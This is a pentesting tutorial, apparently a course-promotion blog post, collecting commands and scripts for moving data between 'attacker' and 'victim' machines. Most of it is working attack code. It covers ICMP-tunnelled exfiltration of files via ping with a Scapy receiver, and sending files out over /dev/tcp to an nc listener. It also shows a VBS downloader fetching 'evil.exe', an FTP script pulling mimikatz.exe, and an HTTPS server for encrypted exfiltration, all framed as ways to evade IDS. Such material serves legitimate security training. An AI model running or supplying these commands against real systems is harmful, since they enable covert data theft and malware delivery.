Useful things for a pentester
A typical story is when you conduct a security audit and want to exploit a vulnerability found, or simply deploy a training stand and you urgently need to find, for example, a working script for loading files via HTTP in Python or PHP. Or you need to perform some simple action, but you cannot remember the syntax of the necessary commands.
Actually, such problems can arise not only for pentesters, but also for representatives of the defending side, and for administrators too. Below we will consider several examples of useful scripts and console commands, both for Linux and Windows.
Bypassing security measures
After successfully penetrating the attacked network, the hacker needs to organize interaction between the victim's network and his own node. Moreover, this interaction should be the least noticeable for security tools. One of the most common ways to “cheat” IDS and various analyzers is to use traffic encapsulation. If the ICMP protocol is allowed on firewalls (and as a rule, this protocol is allowed for node availability diagnostics), then we can encapsulate the payload in ICMP packets and transmit this traffic outside.
Of course, there are many utilities for implementing this functionality, but we agreed to use only scripts and commands. We will transmit four bytes of payload, although if desired, this volume can be increased to 16 bytes. The bytes will be transmitted together with the ping command, that is, in fact, we will simply ping an external node.
On the victim's side, we execute the following set of commands:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
The xxd command creates a representation of the file as hexadecimal byte codes, and we take blocks of four bytes. Then we ping the attacker's node in a loop, transmitting the payload.
If on the victim's side everything is quite simple – we perform a ping, then on the attacker's side we need to run a small script that will receive and process requests.
Here we will need Python and the Scapy library. We listen to the traffic, look at the ICMP packet type and extract the payload.
from scapy.all import *
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
sniff(iface="tun0", prn=process_packet)This simple method allows you to bypass network analyzers when transmitting traffic.
File transfer
Another way to organize data transfer is to use standard ports, for example port 80. Yes, in this case we need to take care of the encapsulation of our traffic separately, since now we will transfer bytes “as is” on a specific port. But, for organizing fast data transfer, these commands can also be useful.
We will need a /dev/tcp “device” and one command on each side.
If we need to download a file from the victim's machine, we do the following:
On the attacker's side, we will have a useful command nc listening on port 80:
nc -lvnp 80 > file
Well, on the victim's side, we redirect the output as follows:
cat /path/file > /dev/tcp/10.10.10.10/80
And when we need to download a file to the victim's machine, we execute the following command on the attacker's side:
nc -w5 -lvnp 80 < file_to_send.txt
On the victim's side, we do the following:
exec 6< /dev/tcp/10.10.10.10/80
cat <&6 > file.txt
Such commands can be used if the attacked machine uses Linux. However, in practice, Windows OS is very common, especially on client nodes.
Let's look at an example of creating a script that actually implements the functionality of wget, that is, allows you to download the desired file via HTTP.
Here the general principle of operation is quite simple. We use the echo command to output the necessary commands to the created wget.vbs script file. The main problem here may be the absence or incompatibility of WinHttp.WinHttpRequest, MSXML2.ServerXMLHTTP and other objects.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbsAs a result, we can download a file from a web server to the victim's machine using this script:
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Good old FTP
Another common protocol for file transfer is FTP. Despite the fact that this is a fairly old protocol, it is still used in many organizations and the corresponding ports are not blocked on firewalls. So it can also be used with impunity to transfer files from the attacked network to the attacker's node.
On the attacker's side we will need an FTP server. You can install, for example, pure-ftp.
apt-get update && apt-get install pure-ftp
To configure correctly, execute the following set of commands:
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restartAs an example of use, let's consider writing a VB script under Windows. The principle here will be the same. We form a text file with commands for FTP, and then use the standard FTP command with parameters from this file. In the text file itself, we simply have a set of commands for interacting with the FTP server.
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txtHTTPS server
And finally, let's look at the quick deployment of a simple web server using SSL encryption. It can be deployed on the attacker's side and data can be transmitted to it in encrypted form.
To do this, we will need to generate key files using the following command:
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
Below is the script code:
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True)
httpd.serve_forever()Next, you just need to run the web server script:
python simple-https-server.py
You can verify that it is working by simply accessing the server on port 443.
Conclusion
We've looked at several useful scripts and commands that will allow you to quickly set up data and file transfers between the attacker and victim nodes. These tools can be useful when you need to quickly deploy the required functionality.
We and our colleagues from OTUS are considering more practical tools within the framework of practical courses on information security. With the full catalog of courses you can see the link.
